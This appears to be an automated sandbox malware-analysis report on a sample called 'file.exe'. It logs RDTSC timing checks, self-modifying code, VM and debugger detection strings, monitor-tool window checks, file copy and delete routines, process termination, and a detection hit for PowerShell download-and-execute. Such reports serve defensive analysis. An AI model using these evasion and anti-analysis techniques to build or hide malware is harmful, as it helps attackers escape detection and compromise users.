              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF555 second address: BBF55D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8755 second address: BB875B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB875B second address: BB875F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB875F second address: BB8796 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FABF0F31B4Eh 0x0000000c js 00007FABF0F31B6Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FABF0F31B59h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8796 second address: BB879A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC2E3 second address: BCC313 instructions: 0x00000000 rdtsc 0x00000002 je 00007FABF0F31B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FABF0F31B61h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFBC3 second address: BDFBE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FABF0D6862Ch 0x0000000e push ecx 0x0000000f jmp 00007FABF0D685FEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFBE2 second address: BDFBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABF0F31B4Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFBF9 second address: BDFBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE48B7 second address: BE48C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FABF0F31B59h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4088 second address: BE4098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FABF0D685F6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE41EB second address: BE4206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B57h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4206 second address: BE420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4492 second address: BE449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 push edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86DD second address: BE86E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86E2 second address: BE86E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86E8 second address: BE86EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86EC second address: BE86F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86F0 second address: BE8702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FABF0D685F6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE89EC second address: BE8A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jns 00007FABF0F31B47h 0x00000012 stc 0x00000013 movsx edx, bx 0x00000016 push 00000004h 0x00000018 push ecx 0x00000019 mov dl, A0h 0x0000001b pop edx 0x0000001c call 00007FABF0F31B49h 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FABF0F31B53h 0x0000002a popad 0x0000002b pop eax 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FABF0F31B4Eh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8A4F second address: BE8A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8C32 second address: BE8C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push esi 0x00000007 je 00007FABF0F31B55h 0x0000000d pop esi 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D2E99h], ebx 0x00000015 push dword ptr [ebp+122D3557h] 0x0000001b mov edx, edi 0x0000001d push 881EA78Dh 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 jg 00007FABF0F31B46h 0x0000002b pop ebx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA521 second address: BEA525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA0F3 second address: BEA0F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA0F9 second address: BEA0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA0FF second address: BEA105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA105 second address: BEA109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA109 second address: BEA10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F802B5 second address: 4F802B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F802B9 second address: 4F802D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8036A second address: 4F80370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80370 second address: 4F80374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80374 second address: 4F803A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx esi, dx 0x0000000d push ebx 0x0000000e mov di, cx 0x00000011 pop eax 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FABF0D68608h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCCB0 second address: AFCCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCCB4 second address: AFCCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 94F937 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 94FA30 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AF3DF3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 94D366 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B7DDF2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27357
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26175
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00713910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00713910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00711269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00711250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00711250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0071E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00714B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00714B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00714B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0071CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00712390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00712390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0070DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0070DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0071DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0071D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00721BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00721BF0
              Source: file.exe, file.exe, 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2085798410.0000000001136000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2085798410.0000000001119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000002.2085798410.0000000001106000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26014
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26181
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26161
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26169
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26033
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26058
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704A60 VirtualProtect 00000000,00000004,00000100,?0_2_00704A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00726390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00726390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00726390 mov eax, dword ptr fs:[00000030h]0_2_00726390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00722A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00722A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2804, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00724610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00724610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007246A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_007246A0
              Source: file.exe, file.exe, 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: rProgram Manager
